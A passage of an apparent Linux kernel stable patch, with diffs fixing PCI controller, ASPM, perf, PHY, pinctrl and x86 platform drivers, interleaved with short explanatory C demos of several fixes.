+ 	val = dw_pcie_readl_dbi(pci, PCI_IO_BASE);
+ 	val &= ~(IO_BASE_IO_DECODE | IO_BASE_IO_DECODE_BIT8);
+ 	dw_pcie_writel_dbi(pci, PCI_IO_BASE, val);
+@@ -1872,11 +1867,6 @@ static void pex_ep_event_pex_rst_deassert(struct tegra_pcie_dw *pcie)
+ 	pcie->pcie_cap_base = dw_pcie_find_capability(&pcie->pci,
+ 						      PCI_CAP_ID_EXP);
+ 
+-	val_16 = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base + PCI_EXP_DEVCTL);
+-	val_16 &= ~PCI_EXP_DEVCTL_PAYLOAD;
+-	val_16 |= PCI_EXP_DEVCTL_PAYLOAD_256B;
+-	dw_pcie_writew_dbi(pci, pcie->pcie_cap_base + PCI_EXP_DEVCTL, val_16);
+-
+ 	/* Clear Slot Clock Configuration bit if SRNS configuration */
+ 	if (pcie->enable_srns) {
+ 		val_16 = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base +
+diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c
+index 3351863352d36..9693bab59bf7c 100644
+--- a/drivers/pci/controller/pci-hyperv.c
++++ b/drivers/pci/controller/pci-hyperv.c
+@@ -3930,6 +3930,9 @@ static int hv_pci_restore_msi_msg(struct pci_dev *pdev, void *arg)
+ 	struct msi_desc *entry;
+ 	int ret = 0;
+ 
++	if (!pdev->msi_enabled && !pdev->msix_enabled)
++		return 0;
++
+ 	msi_lock_descs(&pdev->dev);
+ 	msi_for_each_desc(entry, &pdev->dev, MSI_DESC_ASSOCIATED) {
+ 		irq_data = irq_get_irq_data(entry->irq);
+diff --git a/drivers/pci/controller/pcie-apple.c b/drivers/pci/controller/pcie-apple.c
+index 66f37e403a09c..2340dab6cd5bd 100644
+--- a/drivers/pci/controller/pcie-apple.c
++++ b/drivers/pci/controller/pcie-apple.c
+@@ -783,6 +783,10 @@ static int apple_pcie_init(struct pci_config_window *cfg)
+ 	cfg->priv = pcie;
+ 	INIT_LIST_HEAD(&pcie->ports);
+ 
++	ret = apple_msi_init(pcie);
++	if (ret)
++		return ret;
++
+ 	for_each_child_of_node(dev->of_node, of_port) {
+ 		ret = apple_pcie_setup_port(pcie, of_port);
+ 		if (ret) {
+@@ -792,7 +796,7 @@ static int apple_pcie_init(struct pci_config_window *cfg)
+ 		}
+ 	}
+ 
+-	return apple_msi_init(pcie);
++	return 0;
+ }
+ 
+ static int apple_pcie_probe(struct platform_device *pdev)
+diff --git a/drivers/pci/controller/pcie-microchip-host.c b/drivers/pci/controller/pcie-microchip-host.c
+index 7263d175b5adb..5ba101efd9326 100644
+--- a/drivers/pci/controller/pcie-microchip-host.c
++++ b/drivers/pci/controller/pcie-microchip-host.c
+@@ -167,12 +167,12 @@
+ #define EVENT_PCIE_DLUP_EXIT			2
+ #define EVENT_SEC_TX_RAM_SEC_ERR		3
+ #define EVENT_SEC_RX_RAM_SEC_ERR		4
+-#define EVENT_SEC_AXI2PCIE_RAM_SEC_ERR		5
+-#define EVENT_SEC_PCIE2AXI_RAM_SEC_ERR		6
++#define EVENT_SEC_PCIE2AXI_RAM_SEC_ERR		5
++#define EVENT_SEC_AXI2PCIE_RAM_SEC_ERR		6
+ #define EVENT_DED_TX_RAM_DED_ERR		7
+ #define EVENT_DED_RX_RAM_DED_ERR		8
+-#define EVENT_DED_AXI2PCIE_RAM_DED_ERR		9
+-#define EVENT_DED_PCIE2AXI_RAM_DED_ERR		10
++#define EVENT_DED_PCIE2AXI_RAM_DED_ERR		9
++#define EVENT_DED_AXI2PCIE_RAM_DED_ERR		10
+ #define EVENT_LOCAL_DMA_END_ENGINE_0		11
+ #define EVENT_LOCAL_DMA_END_ENGINE_1		12
+ #define EVENT_LOCAL_DMA_ERROR_ENGINE_0		13
+diff --git a/drivers/pci/controller/pcie-rockchip.h b/drivers/pci/controller/pcie-rockchip.h
+index fe0333778fd93..6111de35f84ca 100644
+--- a/drivers/pci/controller/pcie-rockchip.h
++++ b/drivers/pci/controller/pcie-rockchip.h
+@@ -158,7 +158,9 @@
+ #define PCIE_RC_CONFIG_THP_CAP		(PCIE_RC_CONFIG_BASE + 0x274)
+ #define   PCIE_RC_CONFIG_THP_CAP_NEXT_MASK	GENMASK(31, 20)
+ 
+-#define PCIE_ADDR_MASK			0xffffff00
++#define MAX_AXI_IB_ROOTPORT_REGION_NUM		3
++#define MIN_AXI_ADDR_BITS_PASSED		8
++#define PCIE_ADDR_MASK			GENMASK_ULL(63, MIN_AXI_ADDR_BITS_PASSED)
+ #define PCIE_CORE_AXI_CONF_BASE		0xc00000
+ #define PCIE_CORE_OB_REGION_ADDR0	(PCIE_CORE_AXI_CONF_BASE + 0x0)
+ #define   PCIE_CORE_OB_REGION_ADDR0_NUM_BITS	0x3f
+@@ -185,8 +187,6 @@
+ #define AXI_WRAPPER_TYPE1_CFG			0xb
+ #define AXI_WRAPPER_NOR_MSG			0xc
+ 
+-#define MAX_AXI_IB_ROOTPORT_REGION_NUM		3
+-#define MIN_AXI_ADDR_BITS_PASSED		8
+ #define PCIE_RC_SEND_PME_OFF			0x11960
+ #define ROCKCHIP_VENDOR_ID			0x1d87
+ #define PCIE_LINK_IS_L2(x) \
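
[Illustrative aside, not part of the patch] On the pcie-rockchip.h hunk: the old PCIE_ADDR_MASK literal 0xffffff00 silently drops address bits above bit 31, while GENMASK_ULL(63, MIN_AXI_ADDR_BITS_PASSED) keeps the full 64-bit range. A small demo, with GENMASK_ULL re-created locally as a simplified version of the kernel macro:

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Simplified re-creation of the kernel's GENMASK_ULL(h, l). */
#define GENMASK_ULL(h, l) \
    (((~0ULL) >> (63 - (h))) & ((~0ULL) << (l)))

int main(void)
{
    uint64_t axi_addr = 0x123456789A00ULL;    /* above 4 GiB */

    /* old 32-bit mask truncates the upper bits */
    printf("old: 0x%" PRIx64 "\n", axi_addr & 0xffffff00);         /* 0x56789a00 */
    /* new 64-bit mask preserves them */
    printf("new: 0x%" PRIx64 "\n", axi_addr & GENMASK_ULL(63, 8)); /* 0x123456789a00 */
    return 0;
}
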
+diff --git a/drivers/pci/doe.c b/drivers/pci/doe.c
+index e5e9b287b9766..c1776f82b7fce 100644
+--- a/drivers/pci/doe.c
++++ b/drivers/pci/doe.c
+@@ -223,8 +223,8 @@ static int pci_doe_recv_resp(struct pci_doe_mb *doe_mb, struct pci_doe_task *tas
+ static void signal_task_complete(struct pci_doe_task *task, int rv)
+ {
+ 	task->rv = rv;
+-	task->complete(task);
+ 	destroy_work_on_stack(&task->work);
++	task->complete(task);
+ }
+ 
+ static void signal_task_abort(struct pci_doe_task *task, int rv)
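
[Illustrative aside, not part of the patch] The doe.c hunk reorders signal_task_complete() so destroy_work_on_stack() runs before task->complete(task), presumably because the completion callback may free or recycle the task that embeds the work item, after which any touch of task->work is a use-after-free. The general rule, sketched below: finish every access to an object before handing ownership back to its owner.

#include <stdio.h>
#include <stdlib.h>

struct task {
    int rv;
    int work_alive;                    /* stand-in for the on-stack work item */
    void (*complete)(struct task *);
};

static void teardown_work(struct task *t)
{
    t->work_alive = 0;                 /* must happen while we still own t */
}

static void signal_task_complete(struct task *t, int rv)
{
    t->rv = rv;
    teardown_work(t);                  /* 1: finish all accesses to t ...  */
    t->complete(t);                    /* 2: ... then hand ownership back  */
    /* t may already be freed here; no further dereference is allowed */
}

static void owner_complete(struct task *t)
{
    printf("rv=%d\n", t->rv);
    free(t);                           /* owner reclaims the task at once */
}

int main(void)
{
    struct task *t = malloc(sizeof(*t));
    t->work_alive = 1;
    t->complete = owner_complete;
    signal_task_complete(t, 0);
    return 0;
}
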
+diff --git a/drivers/pci/hotplug/pciehp_hpc.c b/drivers/pci/hotplug/pciehp_hpc.c
+index 112c8f401ac4e..358f077284cbe 100644
+--- a/drivers/pci/hotplug/pciehp_hpc.c
++++ b/drivers/pci/hotplug/pciehp_hpc.c
+@@ -332,17 +332,11 @@ int pciehp_check_link_status(struct controller *ctrl)
+ static int __pciehp_link_set(struct controller *ctrl, bool enable)
+ {
+ 	struct pci_dev *pdev = ctrl_dev(ctrl);
+-	u16 lnk_ctrl;
+ 
+-	pcie_capability_read_word(pdev, PCI_EXP_LNKCTL, &lnk_ctrl);
++	pcie_capability_clear_and_set_word(pdev, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_LD,
++					   enable ? 0 : PCI_EXP_LNKCTL_LD);
+ 
+-	if (enable)
+-		lnk_ctrl &= ~PCI_EXP_LNKCTL_LD;
+-	else
+-		lnk_ctrl |= PCI_EXP_LNKCTL_LD;
+-
+-	pcie_capability_write_word(pdev, PCI_EXP_LNKCTL, lnk_ctrl);
+-	ctrl_dbg(ctrl, "%s: lnk_ctrl = %x\n", __func__, lnk_ctrl);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pci/pci-sysfs.c b/drivers/pci/pci-sysfs.c
+index ba38fc47d35e9..dd0d9d9bc5097 100644
+--- a/drivers/pci/pci-sysfs.c
++++ b/drivers/pci/pci-sysfs.c
+@@ -756,6 +756,13 @@ static ssize_t pci_write_config(struct file *filp, struct kobject *kobj,
+ 	if (ret)
+ 		return ret;
+ 
++	if (resource_is_exclusive(&dev->driver_exclusive_resource, off,
++				  count)) {
++		pci_warn_once(dev, "%s: Unexpected write to kernel-exclusive config offset %llx",
++			      current->comm, off);
++		add_taint(TAINT_USER, LOCKDEP_STILL_OK);
++	}
++
+ 	if (off > dev->cfg_size)
+ 		return 0;
+ 	if (off + count > dev->cfg_size) {
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 88c4372499825..835e9ea14b3a1 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -1193,6 +1193,10 @@ static int pci_dev_wait(struct pci_dev *dev, char *reset_type, int timeout)
+  *
+  * On success, return 0 or 1, depending on whether or not it is necessary to
+  * restore the device's BARs subsequently (1 is returned in that case).
++ *
++ * On failure, return a negative error code.  Always return failure if @dev
++ * lacks a Power Management Capability, even if the platform was able to
++ * put the device in D0 via non-PCI means.
+  */
+ int pci_power_up(struct pci_dev *dev)
+ {
+@@ -1209,9 +1213,6 @@ int pci_power_up(struct pci_dev *dev)
+ 		else
+ 			dev->current_state = state;
+ 
+-		if (state == PCI_D0)
+-			return 0;
+-
+ 		return -EIO;
+ 	}
+ 
+@@ -1269,8 +1270,12 @@ static int pci_set_full_power_state(struct pci_dev *dev)
+ 	int ret;
+ 
+ 	ret = pci_power_up(dev);
+-	if (ret < 0)
++	if (ret < 0) {
++		if (dev->current_state == PCI_D0)
++			return 0;
++
+ 		return ret;
++	}
+ 
+ 	pci_read_config_word(dev, dev->pm_cap + PCI_PM_CTRL, &pmcsr);
+ 	dev->current_state = pmcsr & PCI_PM_CTRL_STATE_MASK;
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 07166a4ec27ad..7e89cdbd446fc 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -250,7 +250,7 @@ static int pcie_retrain_link(struct pcie_link_state *link)
+ static void pcie_aspm_configure_common_clock(struct pcie_link_state *link)
+ {
+ 	int same_clock = 1;
+-	u16 reg16, parent_reg, child_reg[8];
++	u16 reg16, ccc, parent_old_ccc, child_old_ccc[8];
+ 	struct pci_dev *child, *parent = link->pdev;
+ 	struct pci_bus *linkbus = parent->subordinate;
+ 	/*
+@@ -272,6 +272,7 @@ static void pcie_aspm_configure_common_clock(struct pcie_link_state *link)
+ 
+ 	/* Port might be already in common clock mode */
+ 	pcie_capability_read_word(parent, PCI_EXP_LNKCTL, &reg16);
++	parent_old_ccc = reg16 & PCI_EXP_LNKCTL_CCC;
+ 	if (same_clock && (reg16 & PCI_EXP_LNKCTL_CCC)) {
+ 		bool consistent = true;
+ 
+@@ -288,34 +289,29 @@ static void pcie_aspm_configure_common_clock(struct pcie_link_state *link)
+ 		pci_info(parent, "ASPM: current common clock configuration is inconsistent, reconfiguring\n");
+ 	}
+ 
++	ccc = same_clock ? PCI_EXP_LNKCTL_CCC : 0;
+ 	/* Configure downstream component, all functions */
+ 	list_for_each_entry(child, &linkbus->devices, bus_list) {
+ 		pcie_capability_read_word(child, PCI_EXP_LNKCTL, &reg16);
+-		child_reg[PCI_FUNC(child->devfn)] = reg16;
+-		if (same_clock)
+-			reg16 |= PCI_EXP_LNKCTL_CCC;
+-		else
+-			reg16 &= ~PCI_EXP_LNKCTL_CCC;
+-		pcie_capability_write_word(child, PCI_EXP_LNKCTL, reg16);
++		child_old_ccc[PCI_FUNC(child->devfn)] = reg16 & PCI_EXP_LNKCTL_CCC;
++		pcie_capability_clear_and_set_word(child, PCI_EXP_LNKCTL,
++						   PCI_EXP_LNKCTL_CCC, ccc);
+ 	}
+ 
+ 	/* Configure upstream component */
+-	pcie_capability_read_word(parent, PCI_EXP_LNKCTL, &reg16);
+-	parent_reg = reg16;
+-	if (same_clock)
+-		reg16 |= PCI_EXP_LNKCTL_CCC;
+-	else
+-		reg16 &= ~PCI_EXP_LNKCTL_CCC;
+-	pcie_capability_write_word(parent, PCI_EXP_LNKCTL, reg16);
++	pcie_capability_clear_and_set_word(parent, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_CCC, ccc);
+ 
+ 	if (pcie_retrain_link(link)) {
+ 
+ 		/* Training failed. Restore common clock configurations */
+ 		pci_err(parent, "ASPM: Could not configure common clock\n");
+ 		list_for_each_entry(child, &linkbus->devices, bus_list)
+-			pcie_capability_write_word(child, PCI_EXP_LNKCTL,
+-					   child_reg[PCI_FUNC(child->devfn)]);
+-		pcie_capability_write_word(parent, PCI_EXP_LNKCTL, parent_reg);
++			pcie_capability_clear_and_set_word(child, PCI_EXP_LNKCTL,
++							   PCI_EXP_LNKCTL_CCC,
++							   child_old_ccc[PCI_FUNC(child->devfn)]);
++		pcie_capability_clear_and_set_word(parent, PCI_EXP_LNKCTL,
++						   PCI_EXP_LNKCTL_CCC, parent_old_ccc);
+ 	}
+ }
+ 
+diff --git a/drivers/pci/probe.c b/drivers/pci/probe.c
+index 7170516298b0b..0945f50fe94ff 100644
+--- a/drivers/pci/probe.c
++++ b/drivers/pci/probe.c
+@@ -996,6 +996,7 @@ static int pci_register_host_bridge(struct pci_host_bridge *bridge)
+ 		res = window->res;
+ 		if (!res->flags && !res->start && !res->end) {
+ 			release_resource(res);
++			resource_list_destroy_entry(window);
+ 			continue;
+ 		}
+ 
+@@ -2306,6 +2307,13 @@ struct pci_dev *pci_alloc_dev(struct pci_bus *bus)
+ 	INIT_LIST_HEAD(&dev->bus_list);
+ 	dev->dev.type = &pci_dev_type;
+ 	dev->bus = pci_bus_get(bus);
++	dev->driver_exclusive_resource = (struct resource) {
++		.name = "PCI Exclusive",
++		.start = 0,
++		.end = -1,
++	};
++
++	spin_lock_init(&dev->pcie_cap_lock);
+ #ifdef CONFIG_PCI_MSI
+ 	raw_spin_lock_init(&dev->msi_lock);
+ #endif
+diff --git a/drivers/perf/fsl_imx8_ddr_perf.c b/drivers/perf/fsl_imx8_ddr_perf.c
+index 8e058e08fe810..cd4ce2b4906d1 100644
+--- a/drivers/perf/fsl_imx8_ddr_perf.c
++++ b/drivers/perf/fsl_imx8_ddr_perf.c
+@@ -102,6 +102,7 @@ struct ddr_pmu {
+ 	const struct fsl_ddr_devtype_data *devtype_data;
+ 	int irq;
+ 	int id;
++	int active_counter;
+ };
+ 
+ static ssize_t ddr_perf_identifier_show(struct device *dev,
+@@ -496,6 +497,10 @@ static void ddr_perf_event_start(struct perf_event *event, int flags)
+ 
+ 	ddr_perf_counter_enable(pmu, event->attr.config, counter, true);
+ 
++	if (!pmu->active_counter++)
++		ddr_perf_counter_enable(pmu, EVENT_CYCLES_ID,
++			EVENT_CYCLES_COUNTER, true);
++
+ 	hwc->state = 0;
+ }
+ 
+@@ -550,6 +555,10 @@ static void ddr_perf_event_stop(struct perf_event *event, int flags)
+ 	ddr_perf_counter_enable(pmu, event->attr.config, counter, false);
+ 	ddr_perf_event_update(event);
+ 
++	if (!--pmu->active_counter)
++		ddr_perf_counter_enable(pmu, EVENT_CYCLES_ID,
++			EVENT_CYCLES_COUNTER, false);
++
+ 	hwc->state |= PERF_HES_STOPPED;
+ }
+ 
+@@ -568,25 +577,10 @@ static void ddr_perf_event_del(struct perf_event *event, int flags)
+ 
+ static void ddr_perf_pmu_enable(struct pmu *pmu)
+ {
+-	struct ddr_pmu *ddr_pmu = to_ddr_pmu(pmu);
+-
+-	/* enable cycle counter if cycle is not active event list */
+-	if (ddr_pmu->events[EVENT_CYCLES_COUNTER] == NULL)
+-		ddr_perf_counter_enable(ddr_pmu,
+-				      EVENT_CYCLES_ID,
+-				      EVENT_CYCLES_COUNTER,
+-				      true);
+ }
+ 
+ static void ddr_perf_pmu_disable(struct pmu *pmu)
+ {
+-	struct ddr_pmu *ddr_pmu = to_ddr_pmu(pmu);
+-
+-	if (ddr_pmu->events[EVENT_CYCLES_COUNTER] == NULL)
+-		ddr_perf_counter_enable(ddr_pmu,
+-				      EVENT_CYCLES_ID,
+-				      EVENT_CYCLES_COUNTER,
+-				      false);
+ }
+ 
+ static int ddr_perf_init(struct ddr_pmu *pmu, void __iomem *base,
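
[Illustrative aside, not part of the patch] The fsl_imx8_ddr_perf.c hunks replace the pmu_enable()/pmu_disable() heuristics with an active_counter count: the first event to start powers the shared cycle counter on, and the last one to stop powers it off. The first-user-on / last-user-off pattern in isolation:

#include <stdio.h>

static int active_counter;

static void cycles_counter(int on)
{
    printf("cycle counter %s\n", on ? "on" : "off");
}

static void event_start(void)
{
    if (!active_counter++)    /* 0 -> 1: first user enables the shared counter */
        cycles_counter(1);
}

static void event_stop(void)
{
    if (!--active_counter)    /* 1 -> 0: last user disables it */
        cycles_counter(0);
}

int main(void)
{
    event_start();    /* on     */
    event_start();    /* no-op  */
    event_stop();     /* no-op  */
    event_stop();     /* off    */
    return 0;
}
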
+diff --git a/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c b/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c
+index 6170f8fd118e2..d0319bee01c0f 100644
+--- a/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c
++++ b/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c
+@@ -214,8 +214,7 @@ static int __maybe_unused qcom_snps_hsphy_runtime_suspend(struct device *dev)
+ 	if (!hsphy->phy_initialized)
+ 		return 0;
+ 
+-	qcom_snps_hsphy_suspend(hsphy);
+-	return 0;
++	return qcom_snps_hsphy_suspend(hsphy);
+ }
+ 
+ static int __maybe_unused qcom_snps_hsphy_runtime_resume(struct device *dev)
+@@ -225,8 +224,7 @@ static int __maybe_unused qcom_snps_hsphy_runtime_resume(struct device *dev)
+ 	if (!hsphy->phy_initialized)
+ 		return 0;
+ 
+-	qcom_snps_hsphy_resume(hsphy);
+-	return 0;
++	return qcom_snps_hsphy_resume(hsphy);
+ }
+ 
+ static int qcom_snps_hsphy_set_mode(struct phy *phy, enum phy_mode mode,
+diff --git a/drivers/phy/rockchip/phy-rockchip-inno-hdmi.c b/drivers/phy/rockchip/phy-rockchip-inno-hdmi.c
+index 80acca4e9e146..2556caf475c0c 100644
+--- a/drivers/phy/rockchip/phy-rockchip-inno-hdmi.c
++++ b/drivers/phy/rockchip/phy-rockchip-inno-hdmi.c
+@@ -745,10 +745,12 @@ unsigned long inno_hdmi_phy_rk3328_clk_recalc_rate(struct clk_hw *hw,
+ 		do_div(vco, (nd * (no_a == 1 ? no_b : no_a) * no_d * 2));
+ 	}
+ 
+-	inno->pixclock = vco;
+-	dev_dbg(inno->dev, "%s rate %lu\n", __func__, inno->pixclock);
++	inno->pixclock = DIV_ROUND_CLOSEST((unsigned long)vco, 1000) * 1000;
+ 
+-	return vco;
++	dev_dbg(inno->dev, "%s rate %lu vco %llu\n",
++		__func__, inno->pixclock, vco);
++
++	return inno->pixclock;
+ }
+ 
+ static long inno_hdmi_phy_rk3328_clk_round_rate(struct clk_hw *hw,
+@@ -790,8 +792,8 @@ static int inno_hdmi_phy_rk3328_clk_set_rate(struct clk_hw *hw,
+ 			 RK3328_PRE_PLL_POWER_DOWN);
+ 
+ 	/* Configure pre-pll */
+-	inno_update_bits(inno, 0xa0, RK3228_PCLK_VCO_DIV_5_MASK,
+-			 RK3228_PCLK_VCO_DIV_5(cfg->vco_div_5_en));
++	inno_update_bits(inno, 0xa0, RK3328_PCLK_VCO_DIV_5_MASK,
++			 RK3328_PCLK_VCO_DIV_5(cfg->vco_div_5_en));
+ 	inno_write(inno, 0xa1, RK3328_PRE_PLL_PRE_DIV(cfg->prediv));
+ 
+ 	val = RK3328_SPREAD_SPECTRUM_MOD_DISABLE;
+@@ -1021,9 +1023,10 @@ inno_hdmi_phy_rk3328_power_on(struct inno_hdmi_phy *inno,
+ 
+ 	inno_write(inno, 0xac, RK3328_POST_PLL_FB_DIV_7_0(cfg->fbdiv));
+ 	if (cfg->postdiv == 1) {
+-		inno_write(inno, 0xaa, RK3328_POST_PLL_REFCLK_SEL_TMDS);
+ 		inno_write(inno, 0xab, RK3328_POST_PLL_FB_DIV_8(cfg->fbdiv) |
+ 			   RK3328_POST_PLL_PRE_DIV(cfg->prediv));
++		inno_write(inno, 0xaa, RK3328_POST_PLL_REFCLK_SEL_TMDS |
++			   RK3328_POST_PLL_POWER_DOWN);
+ 	} else {
+ 		v = (cfg->postdiv / 2) - 1;
+ 		v &= RK3328_POST_PLL_POST_DIV_MASK;
+@@ -1031,7 +1034,8 @@ inno_hdmi_phy_rk3328_power_on(struct inno_hdmi_phy *inno,
+ 		inno_write(inno, 0xab, RK3328_POST_PLL_FB_DIV_8(cfg->fbdiv) |
+ 			   RK3328_POST_PLL_PRE_DIV(cfg->prediv));
+ 		inno_write(inno, 0xaa, RK3328_POST_PLL_POST_DIV_ENABLE |
+-			   RK3328_POST_PLL_REFCLK_SEL_TMDS);
++			   RK3328_POST_PLL_REFCLK_SEL_TMDS |
++			   RK3328_POST_PLL_POWER_DOWN);
+ 	}
+ 
+ 	for (v = 0; v < 14; v++)
+diff --git a/drivers/pinctrl/pinctrl-mcp23s08_spi.c b/drivers/pinctrl/pinctrl-mcp23s08_spi.c
+index 9ae10318f6f35..ea059b9c5542e 100644
+--- a/drivers/pinctrl/pinctrl-mcp23s08_spi.c
++++ b/drivers/pinctrl/pinctrl-mcp23s08_spi.c
+@@ -91,18 +91,28 @@ static int mcp23s08_spi_regmap_init(struct mcp23s08 *mcp, struct device *dev,
+ 		mcp->reg_shift = 0;
+ 		mcp->chip.ngpio = 8;
+ 		mcp->chip.label = devm_kasprintf(dev, GFP_KERNEL, "mcp23s08.%d", addr);
++		if (!mcp->chip.label)
++			return -ENOMEM;
+ 
+ 		config = &mcp23x08_regmap;
+ 		name = devm_kasprintf(dev, GFP_KERNEL, "%d", addr);
++		if (!name)
++			return -ENOMEM;
++
+ 		break;
+ 
+ 	case MCP_TYPE_S17:
+ 		mcp->reg_shift = 1;
+ 		mcp->chip.ngpio = 16;
+ 		mcp->chip.label = devm_kasprintf(dev, GFP_KERNEL, "mcp23s17.%d", addr);
++		if (!mcp->chip.label)
++			return -ENOMEM;
+ 
+ 		config = &mcp23x17_regmap;
+ 		name = devm_kasprintf(dev, GFP_KERNEL, "%d", addr);
++		if (!name)
++			return -ENOMEM;
++
+ 		break;
+ 
+ 	case MCP_TYPE_S18:
+diff --git a/drivers/platform/chrome/chromeos_acpi.c b/drivers/platform/chrome/chromeos_acpi.c
+index 50d8a4d4352d6..1312aaaa8750b 100644
+--- a/drivers/platform/chrome/chromeos_acpi.c
++++ b/drivers/platform/chrome/chromeos_acpi.c
+@@ -90,7 +90,36 @@ static int chromeos_acpi_handle_package(struct device *dev, union acpi_object *o
+ 	case ACPI_TYPE_STRING:
+ 		return sysfs_emit(buf, "%s\n", element->string.pointer);
+ 	case ACPI_TYPE_BUFFER:
+-		return sysfs_emit(buf, "%s\n", element->buffer.pointer);
++		{
++			int i, r, at, room_left;
++			const int byte_per_line = 16;
++
++			at = 0;
++			room_left = PAGE_SIZE - 1;
++			for (i = 0; i < element->buffer.length && room_left; i += byte_per_line) {
++				r = hex_dump_to_buffer(element->buffer.pointer + i,
++						       element->buffer.length - i,
++						       byte_per_line, 1, buf + at, room_left,
++						       false);
++				if (r > room_left)
++					goto truncating;
++				at += r;
++				room_left -= r;
++
++				r = sysfs_emit_at(buf, at, "\n");
++				if (!r)
++					goto truncating;
++				at += r;
++				room_left -= r;
++			}
++
++			buf[at] = 0;
++			return at;
++truncating:
++			dev_info_once(dev, "truncating sysfs content for %s\n", name);
++			sysfs_emit_at(buf, PAGE_SIZE - 4, "..\n");
++			return PAGE_SIZE - 1;
++		}
+ 	default:
+ 		dev_err(dev, "element type %d not supported\n", element->type);
+ 		return -EINVAL;
+diff --git a/drivers/platform/mellanox/mlxbf-tmfifo.c b/drivers/platform/mellanox/mlxbf-tmfifo.c
+index b2e19f30a928b..d31fe7eed38df 100644
+--- a/drivers/platform/mellanox/mlxbf-tmfifo.c
++++ b/drivers/platform/mellanox/mlxbf-tmfifo.c
+@@ -868,6 +868,7 @@ static bool mlxbf_tmfifo_virtio_notify(struct virtqueue *vq)
+ 			tm_vdev = fifo->vdev[VIRTIO_ID_CONSOLE];
+ 			mlxbf_tmfifo_console_output(tm_vdev, vring);
+ 			spin_unlock_irqrestore(&fifo->spin_lock[0], flags);
++			set_bit(MLXBF_TM_TX_LWM_IRQ, &fifo->pend_events);
+ 		} else if (test_and_set_bit(MLXBF_TM_TX_LWM_IRQ,
+ 					    &fifo->pend_events)) {
+ 			return true;
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index 8a38cd94a605d..d10c097380c56 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -322,7 +322,8 @@ static void amd_pmf_init_features(struct amd_pmf_dev *dev)
+ 
+ static void amd_pmf_deinit_features(struct amd_pmf_dev *dev)
+ {
+-	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
++	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR) ||
++	    is_apmf_func_supported(dev, APMF_FUNC_OS_POWER_SLIDER_UPDATE)) {
+ 		power_supply_unreg_notifier(&dev->pwr_src_notifier);
+ 		amd_pmf_deinit_sps(dev);
+ 	}
+diff --git a/drivers/platform/x86/amd/pmf/sps.c b/drivers/platform/x86/amd/pmf/sps.c
+index fd448844de206..b2cf62937227c 100644
+--- a/drivers/platform/x86/amd/pmf/sps.c
++++ b/drivers/platform/x86/amd/pmf/sps.c
+@@ -121,7 +121,8 @@ int amd_pmf_get_pprof_modes(struct amd_pmf_dev *pmf)
+ 
+ int amd_pmf_power_slider_update_event(struct amd_pmf_dev *dev)
+ {
+-	u8 mode, flag = 0;
++	u8 flag = 0;
++	int mode;
+ 	int src;
+ 
+ 	mode = amd_pmf_get_pprof_modes(dev);
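
[Illustrative aside, not part of the patch] In the amd/pmf/sps.c hunk, mode is widened from u8 to int because amd_pmf_get_pprof_modes() can return a negative errno; squeezed into a u8 the value wraps to a small positive number, so a mode < 0 test can never fire. A short demonstration (the stub function is hypothetical):

#include <errno.h>
#include <stdio.h>

static int get_pprof_modes_stub(void)    /* hypothetical stand-in */
{
    return -EINVAL;                      /* error path */
}

int main(void)
{
    unsigned char mode_u8 = get_pprof_modes_stub();
    int mode_int = get_pprof_modes_stub();

    /* -22 stored in a u8 becomes 234, so the error check is dead code. */
    printf("u8:  %u, negative? %d\n", (unsigned)mode_u8, mode_u8 < 0);  /* 234, 0 */
    printf("int: %d, negative? %d\n", mode_int, mode_int < 0);          /* -22, 1 */
    return 0;
}
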
+diff --git a/drivers/platform/x86/asus-wmi.c b/drivers/platform/x86/asus-wmi.c
+index 02bf286924183..36effe04c6f33 100644
+--- a/drivers/platform/x86/asus-wmi.c
++++ b/drivers/platform/x86/asus-wmi.c
+@@ -738,13 +738,23 @@ static ssize_t kbd_rgb_mode_store(struct device *dev,
+ 				 struct device_attribute *attr,
+ 				 const char *buf, size_t count)
+ {
+-	u32 cmd, mode, r, g,  b,  speed;
++	u32 cmd, mode, r, g, b, speed;
+ 	int err;
+ 
+ 	if (sscanf(buf, "%d %d %d %d %d %d", &cmd, &mode, &r, &g, &b, &speed) != 6)
+ 		return -EINVAL;
+ 
+-	cmd = !!cmd;
++	/* B3 is set and B4 is save to BIOS */
++	switch (cmd) {
++	case 0:
++		cmd = 0xb3;
++		break;
++	case 1:
++		cmd = 0xb4;
++		break;
++	default:
++		return -EINVAL;
++	}
+ 
+ 	/* These are the known usable modes across all TUF/ROG */
+ 	if (mode >= 12 || mode == 9)
+diff --git a/drivers/platform/x86/dell/dell-wmi-sysman/sysman.c b/drivers/platform/x86/dell/dell-wmi-sysman/sysman.c
+index 0a6411a8a104c..b2406a595be9a 100644
+--- a/drivers/platform/x86/dell/dell-wmi-sysman/sysman.c
++++ b/drivers/platform/x86/dell/dell-wmi-sysman/sysman.c
+@@ -396,6 +396,7 @@ static int init_bios_attributes(int attr_type, const char *guid)
+ 	struct kobject *attr_name_kobj; //individual attribute names
+ 	union acpi_object *obj = NULL;
+ 	union acpi_object *elements;
++	struct kobject *duplicate;
+ 	struct kset *tmp_set;
+ 	int min_elements;
+ 
+@@ -454,9 +455,11 @@ static int init_bios_attributes(int attr_type, const char *guid)
+ 		else
+ 			tmp_set = wmi_priv.main_dir_kset;
+ 
+-		if (kset_find_obj(tmp_set, elements[ATTR_NAME].string.pointer)) {
+-			pr_debug("duplicate attribute name found - %s\n",
